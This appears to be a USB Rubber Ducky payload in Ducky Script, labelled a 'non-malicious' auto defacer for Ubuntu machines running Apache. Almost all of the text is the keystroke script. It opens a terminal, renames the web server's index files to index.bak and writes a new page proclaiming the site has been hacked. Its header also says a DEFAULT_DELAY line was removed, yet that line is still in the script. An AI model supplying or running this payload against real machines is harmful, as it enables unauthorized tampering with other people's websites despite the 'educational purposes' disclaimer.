Non-Malicious Auto Defacer

Author: Xcellerator
Duckencoder: 1.2
Target: Ubuntu based systems running the Apache Web Server.
Description: Saves old index file as index.bak, then writes a new one detailing the extensiveness of the hack that has been performed against them. Mad props to anyone who actually pulls this off. Educational Purposes Only.

NOTE: Originally this script had a DEFAULT_DELAY value of 200.  Since this value did not fit into a Java byte (Java bytes are signed) it had no effect on the final script.  It has been removed.

 REM Auto Defacer for Ubuntu Based Machines running Apache.
 REM Author: Xcellerator
 REM Description: Automatically defaces index page of an apache web server.
 DEFAULT_DELAY 200
 ALT F2
 STRING terminal
 ENTER
 STRING cd /var/www
 ENTER
 STRING mv index.* index.bak
 ENTER
 STRING touch index.html
 ENTER
 STRING nano index.html
 ENTER
 STRING <marquee><h1>You have been hacked by the USB Rubber Ducky!</h1></marquee>
 ENTER
 STRING <center><a href="http://www.usbrubberducky.com/"><img src="http://cdn.shopify.com/s/files/1/0068/2142/products/usbducky2.jpg" /></a><center>
 ENTER
 STRING <center><h5>Your old index page can be found <a href="./index.bak">here.</a></h5></center>
 CONTROL x
 STRING y
 ENTER
 STRING exit
 ENTER